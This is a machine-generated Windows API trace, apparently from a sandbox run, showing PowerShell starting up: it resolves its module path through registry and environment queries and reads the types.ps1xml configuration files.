	[0571.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.324] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0571.325] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0571.325] CoTaskMemFree (pv=0x2a8780) 
	[0571.326] CoTaskMemAlloc (cb=0xcc) returned 0x1b3d85e0
	[0571.326] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b3d85e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0571.326] CoTaskMemFree (pv=0x1b3d85e0) 
	[0571.326] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd448 | out: phkResult=0xcd448*=0x324) returned 0x0
	[0571.327] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x2, lpData=0x0, lpcbData=0xcd3c8*=0x6c) returned 0x0
	[0571.327] CoTaskMemAlloc (cb=0x70) returned 0x2459d0
	[0571.327] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd39c, lpData=0x2459d0, lpcbData=0xcd398*=0x6c | out: lpType=0xcd39c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd398*=0x6c) returned 0x0
	[0571.327] CoTaskMemFree (pv=0x2459d0) 
	[0571.327] CoTaskMemAlloc (cb=0xcc) returned 0x1b3d85e0
	[0571.327] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b3d85e0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0571.327] CoTaskMemFree (pv=0x1b3d85e0) 
	[0571.327] CoTaskMemAlloc (cb=0xcc) returned 0x1b3d85e0
	[0571.327] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b3d85e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0571.327] CoTaskMemFree (pv=0x1b3d85e0) 
	[0571.333] RegCloseKey (hKey=0x324) returned 0x0
	[0571.334] CoTaskMemAlloc (cb=0xcc) returned 0x1b3d85e0
	[0571.334] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b3d85e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0571.334] CoTaskMemFree (pv=0x1b3d85e0) 
	[0571.334] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd448 | out: phkResult=0xcd448*=0x324) returned 0x0
	[0571.334] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x0, lpData=0x0, lpcbData=0xcd3c8*=0x0) returned 0x2
	[0571.334] RegCloseKey (hKey=0x324) returned 0x0
	[0571.338] CoTaskMemAlloc (cb=0x20c) returned 0x2b30b0
	[0571.338] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2b30b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0571.340] CoTaskMemFree (pv=0x2b30b0) 
	[0571.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xccfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0571.341] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0571.351] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0571.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.352] CoTaskMemFree (pv=0x2a8780) 
	[0572.915] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0572.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.915] CoTaskMemFree (pv=0x2a8780) 
	[0572.928] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0572.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.929] CoTaskMemFree (pv=0x2a8780) 
	[0572.929] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0572.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.929] CoTaskMemFree (pv=0x2a8780) 
	[0572.936] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x32c) returned 0x0
	[0572.937] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xcd24c, lpData=0x0, lpcbData=0xcd248*=0x0 | out: lpType=0xcd24c*=0x1, lpData=0x0, lpcbData=0xcd248*=0x74) returned 0x0
	[0572.937] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xcd1bc, lpData=0x0, lpcbData=0xcd1b8*=0x0 | out: lpType=0xcd1bc*=0x1, lpData=0x0, lpcbData=0xcd1b8*=0x74) returned 0x0
	[0572.937] CoTaskMemAlloc (cb=0x78) returned 0x2459d0
	[0572.937] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xcd18c, lpData=0x2459d0, lpcbData=0xcd188*=0x74 | out: lpType=0xcd18c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd188*=0x74) returned 0x0
	[0572.938] CoTaskMemFree (pv=0x2459d0) 
	[0572.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0572.938] SetErrorMode (uMode=0x1) returned 0x1
	[0572.938] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0572.938] SetErrorMode (uMode=0x1) returned 0x1
	[0572.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0572.941] SetErrorMode (uMode=0x1) returned 0x1
	[0572.941] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0572.941] SetErrorMode (uMode=0x1) returned 0x1
	[0572.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0572.945] SetErrorMode (uMode=0x1) returned 0x1
	[0572.945] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0572.946] SetErrorMode (uMode=0x1) returned 0x1
	[0572.950] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0572.950] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.950] CoTaskMemFree (pv=0x2a8780) 
	[0572.958] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0572.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.959] CoTaskMemFree (pv=0x2a8780) 
	[0574.531] GetACP () returned 0x4e4
	[0574.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0574.551] SetErrorMode (uMode=0x1) returned 0x1
	[0574.552] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0574.553] GetFileType (hFile=0x330) returned 0x1
	[0574.553] SetErrorMode (uMode=0x1) returned 0x1
	[0574.553] GetFileType (hFile=0x330) returned 0x1
	[0574.555] ReadFile (in: hFile=0x330, lpBuffer=0x2db2c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2db2c80*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0574.558] ReadFile (in: hFile=0x330, lpBuffer=0x2db2c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2db2c80*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0574.558] ReadFile (in: hFile=0x330, lpBuffer=0x2db2c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2db2c80*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0574.559] ReadFile (in: hFile=0x330, lpBuffer=0x2db2c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2db2c80*, lpNumberOfBytesRead=0xcd048*=0xcf3, lpOverlapped=0x0) returned 1
	[0574.559] ReadFile (in: hFile=0x330, lpBuffer=0x2db20db, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2db20db*, lpNumberOfBytesRead=0xcd048*=0x0, lpOverlapped=0x0) returned 1
	[0574.560] ReadFile (in: hFile=0x330, lpBuffer=0x2db2c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2db2c80*, lpNumberOfBytesRead=0xcd048*=0x0, lpOverlapped=0x0) returned 1
	[0574.562] CloseHandle (hObject=0x330) returned 1
	[0574.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0575.934] SetErrorMode (uMode=0x1) returned 0x1
	[0575.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfc0 | out: lpFileInformation=0xccfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0575.934] SetErrorMode (uMode=0x1) returned 0x1
	[0575.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0575.936] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0a8 | out: phkResult=0xcd0a8*=0x330) returned 0x0
	[0575.936] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd02c, lpData=0x0, lpcbData=0xcd028*=0x0 | out: lpType=0xcd02c*=0x1, lpData=0x0, lpcbData=0xcd028*=0x56) returned 0x0
	[0575.936] CoTaskMemAlloc (cb=0x5a) returned 0x1b3e1e70
	[0575.936] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccffc, lpData=0x1b3e1e70, lpcbData=0xccff8*=0x56 | out: lpType=0xccffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccff8*=0x56) returned 0x0
	[0575.936] CoTaskMemFree (pv=0x1b3e1e70) 
	[0575.937] RegCloseKey (hKey=0x330) returned 0x0
	[0575.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0575.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0577.501] GetSystemInfo (in: lpSystemInfo=0xcbce0 | out: lpSystemInfo=0xcbce0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0577.503] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0577.520] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0577.520] GetFileType (hFile=0x32c) returned 0x1
	[0577.520] SetErrorMode (uMode=0x1) returned 0x1
	[0577.520] GetFileType (hFile=0x32c) returned 0x1
	[0577.520] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.520] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.520] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.520] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.521] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.521] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.521] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.521] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.521] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.523] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.524] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.524] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.524] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.525] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.525] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.525] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0577.526] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.394] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.394] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.395] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.395] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.395] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.396] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.396] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.397] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.397] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.397] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.398] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.398] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.398] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.399] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.399] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.400] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.405] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.405] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
